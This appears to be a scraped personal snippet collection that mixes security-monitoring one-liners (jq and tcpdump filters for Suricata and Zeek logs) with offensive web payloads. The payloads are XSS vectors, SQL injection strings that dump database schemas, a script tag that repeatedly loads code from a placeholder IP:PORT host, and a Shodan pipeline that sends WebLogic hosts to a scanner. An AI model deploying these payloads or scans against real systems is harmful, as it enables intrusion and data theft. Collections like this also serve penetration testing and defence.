Zobber

#shodan search --fields ip_str,port,data,product weblogic | .. | awk '{print $1}' | xargs -Iwl ./ws.py -t wl | sed 's/[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}/IP sondeada/g;'

Zobber

jq 'select(.http and .http.http_method=="GET" and (.http.url | . and contains("zip"))) |.' eve.json

Zobber

sudo stdbuf -oL tcpdump -nK -ieth2 src port 555 and host 192.168.1.46 -A | stdbuf -oL egrep -o '\.\[.*\]' | stdbuf -oL awk '{print "Alerta detectada --- "$0}'

Zobber

jq -c 'select((.http or .tls) and .alert) | [.flow_id,.http.hostname,.http.http_method,.alert.signature,.src_ip,.dest_ip]' | sed 's/\"//g;s/\[//;s/\]//;'

Zobber

[.["id.orig_h"],.["id.orig_p"],"->",.["id.resp_h"],.["id.resp_p"],.method,.host,.status_code,.resp_fuids,.resp_mime_types,.request_body_len,.response_body_len,.uri]'

Zobber

cat eve.json |jq .flow_id |sort |uniq |grep -v null |xargs -I% grep % eve.json |ag 774699718895614 | jq -c 'select(.alert and .event_type and .metadata)|[.flow_id,.src_ip,.src_port,.dest_ip,.dest_port,.event_type,.alert.signature,.metadata.flowbits]'

Zobber

"><details/open/ontoggle=confirm`/xss_by_Y000!/`>

(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

CONCAT(0x5441424c45204e414d45533c62723e,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,2,0x30),0x3a20,table_name,0x3c62723e))))x))

"><script>setInterval(function(){d=document;z=d.createElement("script");z.src="//IP:PORT";d.body.appendChild(z)},0)</script>

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydGBZMDAwYDwvc2NyaXB0Pg=='></object>

Zobber

#!/bin/bash

###############################################################################
#                           Authentication Variables                          #
###############################################################################
# Credentials in the form of user:password for Kibana
kCreds=elastic:PASS

###############################################################################
#                               Kibana Variables                              #

Zobber

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\*\shell\runas]
@="Take Ownership"
"NoWorkingDirectory"=""

[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

Zobber

HackBar
-Cookies Manager+
-User-Agent Switcher
-Tamper Data
-FoxyProxy Standard
-Wappalyzer:
-HttpRequester
-RESTClient:
-Tampermonkey
-XSS Me